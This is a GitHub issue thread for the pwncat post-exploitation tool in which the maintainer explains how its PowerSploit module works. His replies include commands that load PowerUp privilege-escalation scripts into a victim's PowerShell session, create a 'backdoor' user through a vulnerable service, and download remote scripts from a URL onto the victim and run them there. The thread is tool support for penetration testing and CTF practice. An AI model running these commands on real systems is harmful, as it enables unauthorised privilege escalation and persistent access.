### ISSUE TITLE
Powersploit

### ISSUE THREAD

**Issue by MattPlayGamez** [calebstewart/pwncat#206]
## Bug Description
I don't know how to use Powersploit in Pwncat. If i do run powersploit privesc nothing happens
## pwncat version
0.4.3
```
$ pwncat --version
0.4.2
```

## Target System (aka "victim")
It doesn't work on my windows box and THM, HTB
## Screenshots
nothing happens

**Comment by calebstewart** [comment]
The `powersploit` module simply reflectively loads the specified PowerSploit modules into the context of your current PowerShell session. Using `run powersploit privesc` will load `PowerUp.ps1` and `Get-System.ps1` from PowerSploit into your session, and allow you to run any of the functions defined there from the remote prompt.

```sh
# reflectively load the powersploit privesc modules into the context
(local) pwncat$ run powersploit privesc
# press C-d to return to the remote prompt
# use the `Write-ServiceBinary` function from `PowerUp.ps1`
(remote) user@host$ Write-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123!
```

**Comment by calebstewart** [comment]
Internally, `powersploit` uses the `manage.powershell.import` module to reflectively load these modules for you. You can use `manage.powershell.import` as well to reflectively load any powershell script into the remote powershell session from a variety of targets:

```sh
# Reflectively load a powershell script from your attacking machine
run manage.powershell.import /path/to/powershell/script.ps1
# Load from a HTTP URL (downloaded from the victim, and reflectively loaded to the victim)
run manage.powershell.import https://powershell.com/my/cool/module.ps1
# Load a module from a GitHub repository
run manage.powershell.import username/repository/path/to/script.ps1
```

**Comment by MattPlayGamez** [comment]
@calebstewart 
Thanks for responding. i was just curious
